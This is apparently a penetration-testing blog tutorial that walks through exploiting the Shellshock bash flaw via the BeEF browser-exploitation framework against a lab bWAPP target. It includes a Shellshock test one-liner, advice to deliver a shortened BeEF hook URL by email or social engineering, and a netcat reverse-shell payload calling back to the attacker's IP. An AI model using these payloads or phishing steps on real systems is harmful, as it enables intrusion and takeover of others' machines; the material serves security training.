Shellshock Exploitation: Using BeEF Framework

In a previous article, we have described the Shellshock vulnerability and in this article we show how to exploit this vulnerability using the BeEF Framework. However, here’s a quick and dirty way to check if you’re vulnerable or not:

  1. Type this command:env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”

img1

Note: If you see “vulnerable this is test” it means you haven’t patched it.

If you see “this is a test”, you’re patched

To know more about how to fix this vulnerability, check this article here.

Let’s now see how we can exploit this vulnerability using the Browser Exploitation Framework or BeEF.

What is BeEF?

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

A typical BeEF exploitation scenario involves:

  • Injecting a JavaScript hook which communicates to the attacker’s browser exploitation framework (BeEF)
  • Waiting for the application user to view the vulnerable page where the stored input is displayed
  • Control the application user’s browser via the BeEF console
  • The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.
  • In order to start BeEF we can follow below steps or we can do from CLI

From the GUI:

img2

Note: if you get an error, maybe you haven’t installed the beef xss framework

From CLI:

img3

Setting up beEF for shellshock ( updating plugin for beEF )

  • Go to the directory as shown below

img4

Above figure shows the directory of shell_shocked

Note: Make sure you have updated your Kali Linux

  • There are 3 files which you need to update on this directory, you can download the code from this link
  • The command to update it is as follows:

              root@Shield:/usr/share/beef-xss/modules/exploits/shell_shocked# wget url_of_command.js

              root@Shield:/usr/share/beef-xss/modules/exploits/shell_shocked# wget url_of_config.yaml

              root@Shield:/usr/share/beef-xss/modules/exploits/shell_shocked# wget url_of_module.rb

  • After doing this change you will now have the shellshock plugin in beEF

img5

The setup:

Before we start, here are the details of the setup I have used in this tutorial.

Attacker:

  • OS: Kali Linux
  • IP: 192.168.217.130

Victim:

  • OS: Ubuntu 8.0.4 (bWAPP framework for testing)
  • IP: 192.168.217.134

 Step by Step shellshock Exploitation Using Beef XSS Framework:

  1. First we need to find the vulnerable target, here for testing purpose I have used the bWAPP Framework.                                                                            Fig 1 We find that the shellshock vulnerability exists in the target                                                                Fig 1: We find that the shellshock vulnerability exists in the target
  2.  Now start BeEF from the attacker’s system. After running BeEF, the login window pops up. By default the username: beef and password: beef.The beef control panel should be athttp://YOURIP_OR_HOSTNAME:3000/ui/panelFig -2 BeEF interface

    Fig -2  BeEF interface

  3. This is the default display when you successfully log in to the beef xss framework control panelFig 3 Default Login Display

    Fig -3 Default Login Display

  4. We must inject the hook URL address to the shellshock vulnerable machine.The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be run against the target.So now we will take the hook URL and try to send it to the victimFig 4 Copying link for exploiting victim machine

    Fig -4 Copying link for exploiting victim machine

  5. After you copy the link location, replace the loopback IP address with your machine’s IP address (Attacker IP)
    Fig 5 Replacing IP address

    Fig 5: Replacing IP address

  6. Now we will craft this URL and send to the victim via social engineering or via emailMy URL: http://192.168.217.130:3000/demos/basic.htmlCrafted URL: http://goo.gl/MI2D9G                                                                                             Note: you can modify the URL by Google URL shortener
  7. The victim opens the crafted URL
    Fig 6 Victim clicking on crafted URL

    Fig 6: Victim clicking on crafted URL

  8. As soon as the victim clicks on the crafted URL the hook will be planted on beEF running on the attacker’s machine and the victim’s browser details and other information will be disclosed.Fig 7 Victims browser information disclosed

    Fig 7: Victims browser information disclosed

  9. Attacking the victim using shellshock
  10. Now I will use the following commandTarget: http://192.168.217.134/bWAPP/cgi-bin/shellshock.sh   → This will be my victimBash command: /bin/sh -c ‘nc 192.168.217.130 666 -e /bin/bash’  → bash command                                                                                                                                                                      Fig 8 attacking the Victim machine by shell shock

    Fig – 8 attacking the Victim machine by shell shock

  11. At this moment attacker must listen on port 666Fig 9 Attacker listening on port 666

    Fig 9 : Attacker listening on port 666

     Note: Here we are using port 666

  12. Now after clicking on Execute we can run the command and then you will have your shell                                                                                                  Fig 10 Attacker having access to victim shell

    Fig 10: Attacker having access to victim shell

 Conclusion:

In this article we saw how easily the Browser Exploitation Framework (BeEF) can be used easily to exploit a system that is vulnerable to #Shellshock.

 

Nilesh Sapariya

Nilesh Sapariya works as an Security Analyst at NII. He has carried out Vulnerability Assessments and Penetration Tests for Web Applications and Networks.He has good understanding of Wireless security.He is an active member and a speaker at Nullcon (Mumbai Chapter).

Latest posts by Nilesh Sapariya (see all)

Share This

2 Comments

Leave a Reply

Your email address will not be published.


*